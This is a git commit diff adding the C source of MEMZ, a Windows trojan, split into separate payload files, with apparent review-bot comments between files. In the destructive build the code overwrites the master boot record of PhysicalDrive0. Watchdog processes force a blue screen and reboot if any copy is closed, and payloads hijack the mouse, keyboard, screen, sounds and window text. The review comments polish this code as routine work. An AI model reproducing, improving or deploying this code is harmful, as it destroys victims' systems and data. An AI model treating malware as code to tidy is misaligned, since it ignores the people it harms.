Payloads are now in seperate files

Leurak 2017-05-01 16:17:49 +02:00
parent 887e311358
commit 8d4f4901d2
22 changed files with 829 additions and 360 deletions


@ -68,7 +68,7 @@ with open(sys.argv[1], "w") as cf:
cf.write('#include "Data.h"\n')
hf.write("#pragma once\n")
hf.write('#include "../Source/memz.h"\n')
hf.write('#include "../Source/MEMZ.h"\n')
# MBR Binary
with open(MBRCODE, "rb") as inf:


@ -0,0 +1,52 @@
#define UNICODE
#include "../Build/Mode.h"
#ifdef CLEAN
// Enable XP styles
#pragma comment(linker,"\"/manifestdependency:type='win32' \
name='Microsoft.Windows.Common-Controls' version='6.0.0.0' \
processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
// Window attributes
#define BTNWIDTH 200
#define BTNHEIGHT 30
#define COLUMNS 3
#define ROWS ((nPayloads + nPayloads%COLUMNS)/COLUMNS)
#define SPACE 10
#define WINDOWWIDTH COLUMNS * BTNWIDTH + (COLUMNS + 1)*SPACE
#define WINDOWHEIGHT ROWS * BTNHEIGHT + (ROWS + 1)*SPACE + 32
#endif
//#pragma once
#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#include <psapi.h>
#include <commctrl.h>
#include "../Build/Data.h"
#include "Payloads/Payloads.h"
void start();
int random();
void strReverseW(LPWSTR str);
PAYLOADHOST(payloadHostDefault);
PAYLOADHOST(payloadHostVisual);
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
#ifndef CLEAN
void killWindows();
void killWindowsInstant();
DWORD WINAPI ripMessageThread(LPVOID);
DWORD WINAPI watchdogThread(LPVOID);
#else
DWORD WINAPI keyboardThread(LPVOID lParam);
extern BOOLEAN enablePayloads;
BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam);
#endif
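Review bot: `ROWS` in the new MEMZ.h does not round up: `((nPayloads + nPayloads%COLUMNS)/COLUMNS)` yields 3 for 10 payloads with `COLUMNS` set to 3, where four rows are needed, and it is only correct by coincidence for the 11 entries currently in the payload table. The usual ceiling form is `#define ROWS ((nPayloads + COLUMNS - 1) / COLUMNS)`. `WINDOWWIDTH` and `WINDOWHEIGHT` also expand without outer parentheses, so an expression such as `2 * WINDOWWIDTH` would bind to the first term only; wrapping both macro bodies in parentheses avoids that.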

378
WindowsTrojan/Source/Main.c Normal file

@ -0,0 +1,378 @@
#include "MEMZ.h"
#ifdef CLEAN
HWND mainWindow; // In the main window, in the main window, in the main window, ...
HFONT font;
HWND dialog;
#endif
void start() {
#ifndef CLEAN
int argc;
LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc);
if (argc > 1) {
if (!lstrcmpW(argv[1], L"/watchdog")) {
CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL);
WNDCLASSEXA c;
c.cbSize = sizeof(WNDCLASSEXA);
c.lpfnWndProc = WindowProc;
c.lpszClassName = "hax";
c.style = 0;
c.cbClsExtra = 0;
c.cbWndExtra = 0;
c.hInstance = NULL;
c.hIcon = 0;
c.hCursor = 0;
c.hbrBackground = 0;
c.lpszMenuName = NULL;
c.hIconSm = 0;
RegisterClassExA(&c);
HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL);
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) > 0) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
} else {
// Another very ugly formatting
if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\
This malware will harm your computer and makes it unusable.\r\n\
If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\
If you know what this malware does and are using a safe environment to test, \
press Yes to start it.\r\n\r\n\
DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES ||
MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\
THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\
STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) {
ExitProcess(0);
}
wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2);
GetModuleFileName(NULL, fn, 8192);
for (int i = 0; i < 5; i++)
ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT);
SHELLEXECUTEINFO info;
info.cbSize = sizeof(SHELLEXECUTEINFO);
info.lpFile = fn;
info.lpParameters = L"/main";
info.fMask = SEE_MASK_NOCLOSEPROCESS;
info.hwnd = NULL;
info.lpVerb = NULL;
info.lpDirectory = NULL;
info.hInstApp = NULL;
info.nShow = SW_SHOWDEFAULT;
ShellExecuteEx(&info);
SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS);
ExitProcess(0);
}
HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
if (drive == INVALID_HANDLE_VALUE)
ExitProcess(2);
unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536);
// Join the two code parts together
int i = 0;
for (; i < mbrStage1Len; i++)
*(bootcode + i) = *(mbrStage1 + i);
for (i = 0; i < mbrStage2Len; i++)
*(bootcode + i + 0x1fe) = *(mbrStage2 + i);
DWORD wb;
if (!WriteFile(drive, bootcode, 65536, &wb, NULL))
ExitProcess(3);
CloseHandle(drive);
HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
if (note == INVALID_HANDLE_VALUE)
ExitProcess(4);
if (!WriteFile(note, Note, NoteLen, &wb, NULL))
ExitProcess(5);
CloseHandle(note);
ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT);
for (int p = 0; p < nPayloads; p++) {
Sleep(payloads[p].startDelay);
CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL);
}
for (;;) {
Sleep(10000);
}
#else // CLEAN
InitCommonControls();
dialog = NULL;
LOGFONT lf;
GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf);
font = CreateFont(lf.lfHeight, lf.lfWidth,
lf.lfEscapement, lf.lfOrientation, lf.lfWeight,
lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet,
lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality,
lf.lfPitchAndFamily, lf.lfFaceName);
WNDCLASSEXW c;
c.cbSize = sizeof(WNDCLASSEX);
c.lpfnWndProc = WindowProc;
c.lpszClassName = L"MEMZPanel";
c.style = CS_HREDRAW | CS_VREDRAW;
c.cbClsExtra = 0;
c.cbWndExtra = 0;
c.hInstance = NULL;
c.hIcon = 0;
c.hCursor = 0;
c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1);
c.lpszMenuName = NULL;
c.hIconSm = 0;
RegisterClassExW(&c);
RECT rect;
rect.left = 0;
rect.right = WINDOWWIDTH;
rect.top = 0;
rect.bottom = WINDOWHEIGHT;
AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE);
mainWindow = CreateWindowExW(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX,
50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL);
for (int p = 0; p < nPayloads; p++) {
payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY,
(p%COLUMNS)*BTNWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*BTNHEIGHT + SPACE*(p/COLUMNS+1), BTNWIDTH, BTNHEIGHT,
mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL);
SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE);
CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL);
//CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);
}
SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE);
ShowWindow(mainWindow, SW_SHOW);
UpdateWindow(mainWindow);
CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL);
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) > 0) {
if (dialog == NULL || !IsDialogMessage(dialog, &msg)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
#endif
}
#ifndef CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
if (msg == WM_CLOSE || msg == WM_ENDSESSION) {
killWindows();
return 0;
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}
DWORD WINAPI watchdogThread(LPVOID parameter) {
int oproc = 0;
char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
GetProcessImageFileNameA(GetCurrentProcess(), fn, 512);
Sleep(1000);
for (;;) {
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
PROCESSENTRY32 proc;
proc.dwSize = sizeof(proc);
Process32First(snapshot, &proc);
int nproc = 0;
do {
HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID);
char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
GetProcessImageFileNameA(hProc, fn2, 512);
if (!lstrcmpA(fn, fn2)) {
nproc++;
}
CloseHandle(hProc);
LocalFree(fn2);
} while (Process32Next(snapshot, &proc));
CloseHandle(snapshot);
if (nproc < oproc) {
killWindows();
}
oproc = nproc;
Sleep(10);
}
}
void killWindows() {
// Show cool MessageBoxes
for (int i = 0; i < 20; i++) {
CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL);
Sleep(100);
}
killWindowsInstant();
}
void killWindowsInstant() {
// Try to force BSOD first
// I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)...
// This isn't even an exploit, it's just an undocumented feature.
HMODULE ntdll = LoadLibraryA("ntdll");
FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege");
FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError");
if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) {
BOOLEAN tmp1; DWORD tmp2;
((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1);
((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2);
}
// If the computer is still running, do it the normal way
HANDLE token;
TOKEN_PRIVILEGES privileges;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid);
privileges.PrivilegeCount = 1;
privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0);
// The actual restart
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK);
}
DWORD WINAPI ripMessageThread(LPVOID parameter) {
HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
MessageBoxA(NULL, (LPCSTR)KillMessages[random() % KillMessagesLen], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND);
UnhookWindowsHookEx(hook);
return 0;
}
#else // CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
PAINTSTRUCT ps;
HDC hdc;
if (msg == WM_ACTIVATE) {
if (wParam == NULL)
dialog = NULL;
else
dialog = hwnd;
} else if (msg == WM_DESTROY) {
ExitProcess(0);
} else if (msg == WM_COMMAND) {
if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
for (int p = 0; p < nPayloads; p++) {
if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) {
SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL);
// Most ugly formatting EVER
if (MessageBoxA(hwnd,
"This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\
If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \
virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\
Do you still want to enable it?",
"MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) {
SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL);
}
}
}
}
} else if (msg == WM_PAINT) {
hdc = BeginPaint(hwnd, &ps);
SelectObject(hdc, font);
LPWSTR str;
LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED";
FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY,
L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state);
TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str));
TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65);
EndPaint(hwnd, &ps);
} else {
return DefWindowProc(hwnd, msg, wParam, lParam);
}
return 0;
}
DWORD WINAPI keyboardThread(LPVOID lParam) {
for (;;) {
if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
enablePayloads = !enablePayloads;
if (!enablePayloads) {
RECT rect;
HWND desktop = GetDesktopWindow();
GetWindowRect(desktop, &rect);
RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN);
EnumWindows(&CleanWindowsProc, NULL);
} else {
RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE);
}
while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
Sleep(100);
}
} else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) {
if (enablePayloads) {
for (int p = 0; p < nPayloads; p++) {
if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
payloads[p].delay = ((PAYLOADFUNCTIONDEFAULT((*)))payloads[p].payloadFunction)(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE);
}
}
}
}
Sleep(10);
}
return 0;
}
BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) {
DWORD pid;
if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) {
SendMessage(hwnd, WM_CLOSE, 0, 0);
}
return TRUE;
}
#endif
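Review bot: Nothing in start() tells a reader which of its two bodies is the destructive one: the `#ifndef CLEAN` body writes 65536 bytes assembled from `mbrStage1` and `mbrStage2` to `\\.\PhysicalDrive0` and then loops forever, while the `#else` body only builds the payload panel window. I would add a comment directly above the `#ifndef CLEAN` line inside start(), for example `// Destructive build: overwrites the start of PhysicalDrive0; the CLEAN build below only shows the payload panel.`, and a matching one above the first WindowProc, whose non-CLEAN version calls killWindows() on WM_CLOSE and WM_ENDSESSION. CLEAN is presumably defined in ../Build/Mode.h, which MEMZ.h includes but which is not shown on this page, so the comment should name where the switch lives once that is confirmed.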


@ -0,0 +1,51 @@
#include "../MEMZ.h"
PAYLOADHOST(payloadCrazyBus) {
PAYLOAD *payload = (PAYLOAD*)parameter;
WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 };
HWAVEOUT hwo;
waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL);
const int bufsize = 44100 * 30; // 30 Seconds
char *wavedata = (char *)LocalAlloc(0, bufsize);
WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 };
waveOutPrepareHeader(hwo, &hdr, sizeof(hdr));
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
int freq = 0;
for (int i = 0; i < bufsize; i++) {
if (i % (44100 / 4) == 0)
freq = 44100 / ((random() % 4000) + 1000);
wavedata[i] = (char)(((i % freq) / ((float)freq)) * 100);
}
#ifdef CLEAN
waveOutReset(hwo);
#endif
waveOutWrite(hwo, &hdr, sizeof(hdr));
while (!(hdr.dwFlags & WHDR_DONE)
#ifdef CLEAN
&& (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED)
#endif
) {
Sleep(1);
}
#ifdef CLEAN
if (!enablePayloads || SendMessage(payload->btn, BM_GETCHECK, 0, NULL) != BST_CHECKED) {
waveOutPause(hwo);
}
} else {
Sleep(10);
}
#endif
}
}


@ -0,0 +1,12 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONDEFAULT(payloadCursor) {
PAYLOADHEAD
POINT cursor;
GetCursorPos(&cursor);
SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)));
out: return 2;
}


@ -0,0 +1,19 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONVISUAL(payloadDrawErrors) {
PAYLOADHEAD
int ix = GetSystemMetrics(SM_CXICON) / 2;
int iy = GetSystemMetrics(SM_CYICON) / 2;
POINT cursor;
GetCursorPos(&cursor);
DrawIcon(hdc, cursor.x - ix, cursor.y - iy, LoadIcon(NULL, IDI_ERROR));
if (random() % (int)(10/(times/500.0+1)+1) == 0) {
DrawIcon(hdc, random()%(w-ix), random()%(h-iy), LoadIcon(NULL, IDI_WARNING));
}
out: return 2;
}


@ -0,0 +1,9 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONDEFAULT(payloadExecute) {
PAYLOADHEAD
ShellExecuteA(NULL, "open", (LPCSTR)Sites[random() % SitesLen], NULL, NULL, SW_SHOWDEFAULT);
out: return 1500.0 / (times / 15.0 + 1) + 100 + (random() % 200);
}


@ -0,0 +1,9 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONVISUAL(payloadInvertScreen) {
PAYLOADHEAD
BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY);
out: return 100;
}


@ -0,0 +1,13 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONDEFAULT(payloadKeyboard) {
PAYLOADHEAD
INPUT input;
input.type = INPUT_KEYBOARD;
input.ki.wVk = (random() % (0x5a - 0x30)) + 0x30;
SendInput(1, &input, sizeof(INPUT));
out: return 300 + (random() % 400);
}


@ -0,0 +1,35 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONDEFAULT(payloadMessageBox) {
PAYLOADHEAD
CreateThread(NULL, 4096, &messageBoxThread, NULL, NULL, NULL);
out: return 2000.0 / (times / 8.0 + 1) + 20 + (random() % 30);
}
DWORD WINAPI messageBoxThread(LPVOID parameter) {
HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
MessageBoxW(NULL, L"Still using this computer?", L"lol", MB_SYSTEMMODAL | MB_OK | MB_ICONWARNING);
UnhookWindowsHookEx(hook);
return 0;
}
LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) {
if (nCode == HCBT_CREATEWND) {
CREATESTRUCT *pcs = ((CBT_CREATEWND *)lParam)->lpcs;
if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) {
HWND hwnd = (HWND)wParam;
int x = random() % (GetSystemMetrics(SM_CXSCREEN) - pcs->cx);
int y = random() % (GetSystemMetrics(SM_CYSCREEN) - pcs->cy);
pcs->x = x;
pcs->y = y;
}
}
return CallNextHookEx(0, nCode, wParam, lParam);
}


@ -0,0 +1,22 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONDEFAULT(payloadReverseText) {
PAYLOADHEAD
EnumChildWindows(GetDesktopWindow(), &EnumChildProc, NULL);
out: return 50;
}
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) {
LPWSTR str = (LPWSTR)GlobalAlloc(GMEM_ZEROINIT, sizeof(WCHAR) * 8192);
if (SendMessageTimeoutW(hwnd, WM_GETTEXT, 8192, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL)) {
strReverseW(str);
SendMessageTimeoutW(hwnd, WM_SETTEXT, NULL, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL);
}
GlobalFree(str);
return TRUE;
}


@ -0,0 +1,16 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONVISUAL(payloadScreenGlitches) {
PAYLOADHEAD
int x1 = random() % (w - 400);
int y1 = random() % (h - 400);
int x2 = random() % (w - 400);
int y2 = random() % (h - 400);
int width = random() % 400;
int height = random() % 400;
BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 3;
}


@ -0,0 +1,23 @@
#include "../MEMZ.h"
const char *sounds[] = {
"SystemHand",
"SystemQuestion",
"SystemExclamation"
};
PAYLOADFUNCTIONDEFAULT(payloadWindowsSounds) {
PAYLOADHEAD
// There seems to be a bug where toggling ALL payloads kills the sound output on some systems.
// I don't know why this happens, but using SND_SYNC seems to fix the bug.
// But the sound is not not as fast as before. I hope there is another way to fix it without slowing down the payload.
// As this only happens for the enable-disable part, I will only include that in the clean build as a workaround.
#ifdef CLEAN
PlaySoundA(sounds[random() % (sizeof(sounds)/sizeof(sounds[0]))], GetModuleHandle(NULL), SND_SYNC);
out: return random() % 10;
#else
PlaySoundA(sounds[random() % (sizeof(sounds)/sizeof(sounds[0]))], GetModuleHandle(NULL), SND_ASYNC);
out: return 20 + (random() % 20);
#endif
}


@ -0,0 +1,9 @@
#include "../MEMZ.h"
PAYLOADFUNCTIONVISUAL(payloadTunnel) {
PAYLOADHEAD
StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 4;
}


@ -0,0 +1,85 @@
#include "../MEMZ.h"
PAYLOAD payloads[] = {
Payload(L"Open random websites/programs", payloadHostDefault, (LPVOID)payloadExecute, 30000, FALSE),
Payload(L"Random cursor movement", payloadHostDefault, (LPVOID)payloadCursor, 20000, TRUE),
Payload(L"Random keyboard input", payloadHostDefault, (LPVOID)payloadKeyboard, 20000, FALSE),
Payload(L"Random error sounds", payloadHostDefault, (LPVOID)payloadWindowsSounds, 50000, TRUE),
Payload(L"Invert Screen", payloadHostVisual, (LPVOID)payloadInvertScreen, 30000, TRUE),
Payload(L"Message boxes", payloadHostDefault, (LPVOID)payloadMessageBox, 20000, TRUE),
Payload(L"Draw error icons", payloadHostVisual, (LPVOID)payloadDrawErrors, 10000, TRUE),
Payload(L"Reverse text", payloadHostDefault, (LPVOID)payloadReverseText, 40000, FALSE),
Payload(L"Tunnel effect", payloadHostVisual, (LPVOID)payloadTunnel, 60000, TRUE),
Payload(L"Screen glitches", payloadHostVisual, (LPVOID)payloadScreenGlitches, 15000, TRUE),
Payload(L"Crazy Bus (Ear Rape)", payloadCrazyBus, NULL, 10000, TRUE),
};
const size_t nPayloads = sizeof(payloads) / sizeof(PAYLOAD);
BOOLEAN enablePayloads = TRUE;
PAYLOADHOST(payloadHostDefault) {
PAYLOAD *payload = (PAYLOAD*)parameter;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE);
#else
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
} else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
PAYLOADHOST(payloadHostVisual) {
PAYLOAD *payload = (PAYLOAD*)parameter;
HWND hwnd = GetDesktopWindow();
HDC hdc = GetWindowDC(hwnd);
RECT rekt;
GetWindowRect(hwnd, &rekt);
int w = rekt.right - rekt.left;
int h = rekt.bottom - rekt.top;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE, hwnd, hdc, &rekt, w, h);
#else
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, hwnd, hdc, &rekt, w, h);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
}
else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
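Review bot: The new `payloads[]` table changes two start delays although the commit is described as only moving payloads into separate files: the `payloadCursor` entry goes from 30000 in the removed table to 20000, and the Crazy Bus entry from 1000 to 10000. The `Payload(...)` macro makes this easy to miss, because in the CLEAN build its `Delay` argument is dropped entirely and only the non-CLEAN build stores it as `startDelay`, which start() passes to `Sleep`. If the new values are intended, a comment above the table such as `// Delay is startDelay in ms and is used by the non-CLEAN build only` plus a line in the commit message would make the change reviewable.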


@ -0,0 +1,54 @@
#define PAYLOADHOST(name) DWORD (WINAPI name)(LPVOID parameter)
typedef struct {
PAYLOADHOST(*payloadHost);
void *payloadFunction;
#ifdef CLEAN
wchar_t *name;
BOOLEAN safe;
HWND btn;
int delaytime, delay, runtime, times;
#else
int startDelay;
int delaytime, delay, runtime, times;
#endif
} PAYLOAD;
#ifdef CLEAN
#define Payload(Name, Host, Function, Delay, Safe) {Host, Function, Name, Safe, 0, 0, 0, 0, 0}
#else
#define Payload(Name, Host, Function, Delay, Safe) {Host, Function, Delay, 0, 0, 0, 0}
#endif
#ifdef CLEAN
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime, BOOLEAN skip)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, BOOLEAN skip, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD if (skip) goto out;
#else
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD
#endif
PAYLOADFUNCTIONDEFAULT(payloadExecute);
PAYLOADFUNCTIONDEFAULT(payloadCursor);
PAYLOADFUNCTIONVISUAL(payloadInvertScreen);
PAYLOADFUNCTIONDEFAULT(payloadMessageBox);
PAYLOADFUNCTIONDEFAULT(payloadReverseText);
PAYLOADFUNCTIONDEFAULT(payloadWindowsSounds);
PAYLOADFUNCTIONVISUAL(payloadScreenGlitches);
PAYLOADFUNCTIONDEFAULT(payloadKeyboard);
PAYLOADFUNCTIONVISUAL(payloadTunnel);
PAYLOADFUNCTIONVISUAL(payloadDrawErrors);
PAYLOADHOST(payloadCrazyBus);
// Helper functions
DWORD WINAPI messageBoxThread(LPVOID);
LRESULT CALLBACK msgBoxHook(int, WPARAM, LPARAM);
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam);
#pragma once
extern PAYLOAD payloads[];
extern const size_t nPayloads;
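Review bot: `#pragma once` sits near the end of Payloads.h, after the PAYLOAD typedef and all prototypes; it belongs on the first line, as it was in the removed payloads.h, so the guard is visible where a reader looks for it. The header also uses `DWORD`, `HWND`, `BOOLEAN` and the `CLEAN` switch without including anything itself, so it only compiles when pulled in through MEMZ.h after `<windows.h>`. A one-line comment at the top would record that dependency, for example `// Included from MEMZ.h only; needs <windows.h> and Build/Mode.h first.`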


@ -0,0 +1,36 @@
#include "MEMZ.h"
HCRYPTPROV prov;
int random() {
if (prov == NULL)
if (!CryptAcquireContext(&prov, NULL, NULL, PROV_RSA_FULL, CRYPT_SILENT | CRYPT_VERIFYCONTEXT))
ExitProcess(1);
int out;
CryptGenRandom(prov, sizeof(out), (BYTE *)(&out));
return out & 0x7fffffff;
}
void strReverseW(LPWSTR str) {
int len = lstrlenW(str);
if (len <= 1)
return;
WCHAR c;
int i, j;
for (i = 0, j = len - 1; i < j; i++, j--) {
c = str[i];
str[i] = str[j];
str[j] = c;
}
// Fix Newlines
for (i = 0; i < len - 1; i++) {
if (str[i] == L'\n' && str[i + 1] == L'\r') {
str[i] = L'\r';
str[i + 1] = L'\n';
}
}
}
